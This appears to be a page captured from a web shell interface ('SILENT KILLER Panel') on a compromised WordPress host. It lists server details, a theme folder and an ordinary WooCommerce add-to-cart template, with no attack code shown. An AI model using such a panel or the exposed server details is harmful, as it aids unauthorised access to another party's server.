SILENT KILLERPanel

Current Path: > home > > transcarter > public_html > wp-content > themes > bridge > woocommerce > > loop


Operation   : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Software     : Apache
Server IP    : 198.54.126.42 | Your IP: 216.73.216.135
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home//transcarter/public_html/wp-content/themes/bridge/woocommerce//loop

NameTypeSizeLast ModifiedActions
add-to-cart.php File 1901 bytes March 10 2023 20:42:14.
loop-start.php File 675 bytes March 10 2023 20:42:14.
pagination.php File 1663 bytes March 10 2023 20:42:14.
rating.php File 825 bytes March 10 2023 20:42:14.
result-count.php File 1390 bytes March 10 2023 20:42:14.
sale-flash.php File 1232 bytes March 10 2023 20:42:14.

Reading File: /home//transcarter/public_html/wp-content/themes/bridge/woocommerce//loop/add-to-cart.php

<?php
/**
 * Loop Add to Cart
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/loop/add-to-cart.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see 	    https://docs.woocommerce.com/document/template-structure/
 * @author 		WooThemes
 * @package 	WooCommerce/Templates
 * @version     3.3.0
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

global $product;
$bridge_qode_options = bridge_qode_return_global_options();

$button_classes = ' qbutton add-to-cart-button';
if (isset($bridge_qode_options['woo_products_add_to_cart_hover_type']) && $bridge_qode_options['woo_products_add_to_cart_hover_type'] !== ''){
	$button_classes .= ' enlarge';
}

if ( ! $product->is_in_stock() ) : ?>
	<span class="onsale out-of-stock-button">
        <span class="out-of-stock-button-inner">
            <?php echo apply_filters( 'out_of_stock_add_to_cart_text', esc_html__( 'Out of stock', 'bridge' ) ); ?>
        </span>
    </span>
<?php else :
	echo apply_filters( 'woocommerce_loop_add_to_cart_link', // WPCS: XSS ok.
		sprintf( '<span class="add-to-cart-button-outer"><span class="add-to-cart-button-inner"><a href="%s" data-quantity="%s" class="%s" %s>%s</a></span></span>',
			esc_url( $product->add_to_cart_url() ),
			esc_attr( isset( $args['quantity'] ) ? $args['quantity'] : 1 ),
			esc_attr( isset( $args['class'] ) ? $args['class'] . $button_classes : 'button' . $button_classes ),
			isset( $args['attributes'] ) ? wc_implode_html_attributes( $args['attributes'] ) : '',
			esc_html( $product->add_to_cart_text() )
		),
		$product, $args );

endif;

SILENT KILLER Tool